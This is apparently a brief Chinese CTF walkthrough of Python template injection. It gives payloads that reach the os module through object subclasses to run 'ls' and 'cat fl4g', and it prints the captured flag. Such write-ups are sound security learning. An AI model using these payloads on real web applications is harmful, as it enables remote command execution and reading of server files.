提示python模板注入,尝试{{1+1}}看看{{}}内的代码是否被执行
很明显被执行,说明有注入点
调用os模块的popen执行ls打印所有文件
{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("ls").read()}}
当然我们也可以用os模块的listdir来打印文件
{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir("./")}}
发现fl4g文件,flag应该就在这个文件里,接下来想办法读取这个文件
.执行cat命令查看目标文件
{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("cat fl4g").read()}}
ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}
借鉴(https://blog.csdn.net/zss192/article/details/104199520)